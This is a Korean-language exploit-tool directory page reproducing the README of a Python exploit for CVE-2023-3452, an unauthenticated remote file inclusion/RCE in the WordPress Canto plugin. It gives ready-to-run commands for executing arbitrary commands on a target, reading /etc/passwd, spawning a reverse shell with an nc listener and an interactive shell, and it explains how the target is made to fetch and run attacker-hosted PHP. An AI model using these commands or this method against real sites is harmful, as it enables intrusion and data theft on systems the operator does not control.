Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-3452---WordPress-Canto-Plugin-RCE — CVE-2023-3452 익스플로잇 (WordPress Canto 플러그인 RCE, HTTPS 지원 포함) | Kitploit
도구/GitHubGitHub/alpastx/cve-2023-3452---wordpress-canto-plugin-rce
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubalpastx/cve-2023-3452---wordpress-canto-plugin-rce

CVE-2023-3452---WordPress-Canto-Plugin-RCE

CVE-2023-3452 익스플로잇 (WordPress Canto 플러그인 RCE, HTTPS 지원 포함)

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
5개월 전아직 검토되지 않음

CVE-2023-3452 - WordPress Canto 플러그인 RCE

WordPress Canto 플러그인 (≤ 3.0.4) RFI 취약점에 대한 익스플로잇입니다. 실제로 HTTPS에서 작동합니다 — 다른 공개 PoC는 SSL에서 포기하는 편이었습니다.

공로는 마땅히 인정해야 합니다: 이 CVE는 다른 사람들이 발견했습니다. 저는 HTTPS 대상에서도 작동하는 버전을 만들었을 뿐입니다.

취약점

CVECVE-2023-3452
EDB-ID51826
유형원격 파일 포함 (RFI) → 인증 없는 RCE
영향 받는 대상WordPress Canto 플러그인 < 3.0.5 (≤ 3.0.4)
공개자Leopoldo Angulo (leoanggal1) — 2024-02-27
위치/wp-content/plugins/canto/includes/lib/download.php
벡터wp_abspath가 검증 없이 PHP 파일을 포함하는 데 사용됩니다 — 원격으로 우리의 파일을 포함시킵니다.

이 버전이 필요한 이유?

이 CVE에 대한 대부분의 익스플로잇은 SSL 검증 때문에 HTTPS에서 작동하지 않습니다. 이 스크립트는:

  • verify=False를 사용하여 HTTPS 대상이 실제로 작동하도록 함
  • urllib3 경고 스팸을 억제함
  • HTTP와 HTTPS 모두 동일하게 실행됨 — 별도 설정 필요 없음

요구 사항

  • Python 3.6+
  • requests

설치

root@kitploit:~
pip install -r requirements.txt

또는 간단히: pip install requests

사용법

root@kitploit:~
python3 canto_exploit.py -t <TARGET_URL> -l <LHOST> -p <LPORT> [OPTIONS]

인수

* 명령어 없음 = 건강 체크로 id; whoami; hostname 실행

예제

단일 명령어:

root@kitploit:~
python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 -c "id"

파일 읽기:

root@kitploit:~
python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 -c "cat /etc/passwd"

리버스 셸 (먼저 nc -lvnp 4444 실행):

root@kitploit:~
python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 --revshell --shell-port 4444

대화형 모드:

root@kitploit:~
python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 -i

HTTPS CTF 대상:

root@kitploit:~
python3 canto_exploit.py -t https://10.129.1.136 -l 10.10.14.33 -p 8888 -c "id"

작동 방식

  1. 확인 — /wp-content/plugins/canto/readme.txt에 접속하여 버전을 확인합니다 (≤ 3.0.4 = 취약함)
  2. 페이로드 — system()을 통해 명령어를 실행하는 가짜 wp-admin/admin.php를 작성합니다
  3. 서빙 — 대상이 우리 파일을 가져올 수 있도록 로컬 HTTP 서버를 실행합니다
  4. 트리거 — wp_abspath=http://LHOST:LPORT로 download.php에 요청하여 원격 PHP를 포함하도록 합니다
  5. 실행 — 대상 서버가 우리 코드를 실행하고, 결과를 돌려받습니다

네트워크 참고 사항

  • 대상이 LHOST:LPORT에서 사용자 머신에 접근할 수 있어야 합니다 (HTB/실습실의 경우 VPN IP)
  • 방화벽에서 페이로드 포트(-p)의 인바운드를 허용해야 합니다

면책 조항

승인된 테스트 및 교육 목적으로만 사용하십시오. 허가된 시스템만 다루십시오. 그 외의 용도는 불법입니다.

라이선스

MIT

도구 다운로드
옵션설명필수 여부
-t, --target대상 WordPress URL (HTTP 또는 HTTPS)예
-l, --lhost사용자 IP — 페이로드를 위해 대상이 이 IP에 접근 가능해야 함예
-p, --lport페이로드 서버 포트 (기본값: 8888)아니오
-c, --command대상에서 실행할 명령어아니오*
--revshell리버스 셸 생성아니오
--shell-port리버스 셸용 리스너 포트 (기본값: 4444)아니오
-i, --interactive대화형 셸 모드아니오
-v, --verbose추가 출력아니오
--skip-check취약점 확인 건너뛰기아니오